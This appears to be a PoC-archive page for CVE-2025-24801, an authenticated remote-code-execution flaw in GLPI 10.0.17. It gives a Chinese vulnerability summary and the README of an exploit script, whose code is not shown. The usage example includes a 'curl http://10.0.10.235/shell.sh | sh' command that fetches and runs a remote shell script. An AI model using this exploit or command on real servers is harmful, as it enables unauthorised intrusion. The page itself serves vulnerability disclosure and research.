Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-24801 PoC — GLPI 代码问题漏洞

Source
Associated Vulnerability
Title:GLPI 代码问题漏洞 (CVE-2025-24801)
Description:GLPI是GLPI开源的一款开源IT和资产管理软件。该软件提供功能全面的IT资源管理接口,你可以用它来建立数据库全面管理IT的电脑,显示器,服务器,打印机,网络设备,电话,甚至硒鼓和墨盒等。 GLPI存在代码问题漏洞,该漏洞源于认证用户可以上传并强制执行位于GLPI服务器上的php文件。
Readme
# CVE-2025-24801

This exploit uses CVE-2025-24801 to get Remote Code Execution (RCE) via Local File Inclusion (LFI) at GLPI 10.0.17. [Proof of Concept (PoC)](https://blog.lexfo.fr/glpi-sql-to-rce.html) of this CVE with explaination to this vulnerability in GLPI.

## Observation
Some applications expose the `/glpi/` endpoint (e.g., http://172.16.11.130:8080/glpi/front/computer.form.php). If the target application includes this endpoint, it is necessary to add it to the --url parameter (e.g., --url http://172.16.11.130:8080/glpi).

## Usage
Example of usage.
```bash
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password
```

If you already executed this exploit and triggered RCE, you can use `--cmd ` parameter to just execute the command.
```bash
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password --cmd "curl http://10.0.10.235/shell.sh | sh"
```
File Snapshot

[4.0K] /data/pocs/5fe2c4d79af46736dad9e423de7a19b0f4fe0e99 ├── [ 11K] cve-2025-24801.py ├── [ 939] README.md └── [ 24] requirements.txt 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.